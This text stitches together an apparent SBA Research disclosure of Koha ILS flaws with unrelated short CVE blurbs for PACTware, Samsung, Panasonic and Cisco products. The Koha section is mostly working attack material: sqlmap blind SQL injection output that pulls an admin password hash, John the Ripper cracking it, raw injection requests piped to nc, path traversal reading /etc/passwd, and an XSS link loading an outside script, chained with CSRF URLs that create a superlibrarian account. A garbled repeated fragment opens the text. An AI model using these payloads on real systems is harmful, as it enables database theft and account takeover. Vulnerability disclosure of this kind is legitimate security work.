http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1 Give the new user superlibririan permission: ---------------------------------------------------------- --> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian The attacker can now log as superlibrarian. Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists. # ################################################################################################## # # PoC / Attack Scenario End     # # ################################################################################################## #

Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl. Koha Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. Multiple cross site request forgery vulnerabilities An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure  =============================================================================================== title: Koha Unauthenticated SQL injection product:         Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website:         http://www.koha-community.org/ found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact:         cst@sba-research.org References: http://koha-community.org/security-release-koha-3-20-1/         http://koha-community.org/security-release-koha-3-18-8/         http://koha-community.org/security-release-koha-3-16-12/         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418         ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 =============================================================================================== ========================= 1. Mutiple SQL Injections ========================= + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + Vulnerability: -------------- The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 # ################################################################################################## # # PoC:     # # ################################################################################################## # 1. Inspect Koha database schema    Have a look at how to query the database for superlibrarian users:    http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians    So basically we we need to execute some SQL statement like this:    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; 2. Query the database with sqlmap    So let's fire up sqlmap with the --sql-shell parameter and input the query:    root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4          _     ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}    |_ -| . | |     | .'| . |    |___|_  |_|_|_|_|__,|  _|          |_|           |_|   http://sqlmap.org    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program    [*] starting at 09:20:07    [09:20:07] [INFO] testing connection to the target URL    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:    ---    Parameter: number (GET)        Type: AND/OR time-based blind        Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)        Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)    ---    [09:20:09] [INFO] testing MySQL    [09:20:09] [INFO] confirming MySQL    [09:20:09] [INFO] the back-end DBMS is MySQL    web server operating system: Linux Debian    web application technology: Apache 2.4.10    back-end DBMS: MySQL >= 5.0.0    [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;    [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'    [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind    [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                          [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors     admin    [09:21:46] [INFO] retrieved: $2a$08$taQ    [09:23:33] [ERROR] invalid character detected. retrying..    [09:23:33] [WARNING] increasing time delay to 5 seconds     afOgEEhU    [09:25:10] [ERROR] invalid character detected. retrying..    [09:25:10] [WARNING] increasing time delay to 6 seconds     t/gW    [09:26:13] [ERROR] invalid character detected. retrying..    [09:26:13] [WARNING] increasing time delay to 7 seconds     TOmqnYe1Y6ZNxCENa    [09:29:57] [ERROR] invalid character detected. retrying..    [09:29:57] [WARNING] increasing time delay to 8 seconds     2.ONk2eZhnuEw5z9OjjxS    [09:35:08] [ERROR] invalid character detected. retrying..    [09:35:08] [WARNING] increasing time delay to 9 seconds     select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:        'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS' 3. Feed john the ripper and be lucky    root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass    root@kali:/home/wicked# john ./admin-pass     Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])    admin            (?)    guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate    Use the "--show" option to display all of the cracked passwords reliably    root@kali:/home/wicked# john ./admin-pass --show    ?:admin    1 password hash cracked, 0 left 4. If the webserver is misconfigured, read & write access to the filesystem may be possible. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 # ################################################################################################## # # PoC:     # # ################################################################################################## # ==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002 ==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002 ==================================================================== You will notice different output in every second request, demonstrating the evaluation of the payload. # ################################################################################################## # # PoC End     # # ################################################################################################## # ================================= 3. Path Traversal (CVE-2015-4633) ================================= Vulnerability ------------- The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal. References ---------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 # ################################################################################################## # # PoC:     # # ################################################################################################## # The following input is used to print out /etc/passwd: /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd # ################################################################################################## # # PoC End     # # ################################################################################################## # ================================= 4. The site also lacks in the implementation of challenge tokens that prevent cross-site  forgery (XSRF) attacks.   The attack can be performed by: - through a compromised user account.   References ---------------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418 # ################################################################################################## # # PoC / Attack Scenario:     # # ################################################################################################## # Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link: --> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0 Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens  --> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example: Create new user: ----------------------- --> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1 Give the new user superlibririan permission: ---------------------------------------------------------- --> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian The attacker can now log as superlibrarian. Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists. # ################################################################################################## # # PoC / Attack Scenario End     # # ################################################################################################## #

PACTware 4.1 SP3 allows remote attackers to cause a denial of service (application crash) via a crafted file that triggers an internal error. PACTware There is a service disruption ( Application crash ) There are vulnerabilities that are put into a state. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. PACTware is a set of independent fieldbus software for operating field instruments in the German PACTware Software Alliance. A security vulnerability exists in PACTware 4.1 SP3. PACTware is prone to a local denial-of-service vulnerability. A local attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. PACTware 4.1 Service Pack 3 is vulnerable

The createFromParcel method in the com.absolute.android.persistence.MethodSpec class in Samsung Galaxy S5s allows remote attackers to execute arbitrary files via a crafted Parcelable object in a serialized MethodSpec object. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. Authentication is not required to exploit this vulnerability.The specific flaw exists within the com.absolute.android.persistence.MethodSpec Class. The createFromParcel() method performs dynamic class loading but does not restrict the source of the classes to be loaded. The Samsung Galaxy S5 is a smartphone released by South Korea's Samsung. Failed exploit attempts will cause a denial-of-service condition

Stack-based buffer overflow in the Ipropsapi.ipropsapiCtrl.1 ActiveX control in ipropsapivideo in Panasonic Security API (PS-API) ActiveX SDK before 8.10.18 allows remote attackers to execute arbitrary code via a long string to the MulticastAddr method. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the Ipropsapi.ipropsapiCtrl.1 ActiveX control. By passing an overly long string to the MulticastAddr method, an attacker can overflow a buffer on the stack. This vulnerability could be used to execute arbitrary code under the context of the user. The Panasonic Security API is an API interface for a webcam from Matsushita Electric Industrial Co., Ltd., Japan. Failed exploit attempts will likely result in denial-of-service conditions

Multiple stack-based buffer overflows in Ipropsapi in Panasonic Security API (PS-API) ActiveX SDK before 8.10.18 allow remote attackers to execute arbitrary code via a long string in the (1) FilePassword property or to the (2) GetStringInfo method. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists in the GetStringInfo method. By passing a large string to the method, an attacker can cause a fixed-length stack buffer to overflow. An attacker could leverage this vulnerability to execute code under the context of the current process. The Panasonic Security API SDK is an API interface development kit (SDK) for a webcam from Matsushita Electric Industrial Co., Ltd., Japan. Failed exploit attempts will likely result in denial-of-service conditions

Cisco Unified Communications Manager IM and Presence Service 9.1(1) does not properly restrict access to encrypted passwords, which allows remote attackers to determine cleartext passwords, and consequently execute arbitrary commands, by visiting an unspecified web page and then conducting a decryption attack, aka Bug ID CSCuq46194. A remote attacker can exploit this issue to gain elevated privileges on an affected device. This issue is being tracked by Cisco Bug ID CSCuq46194

SQL injection vulnerability in Cisco Unified Communications Manager IM and Presence Service 9.1(1) allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCuq46325. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This issue being tracked by Cisco Bug IDs CSCuq46325. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands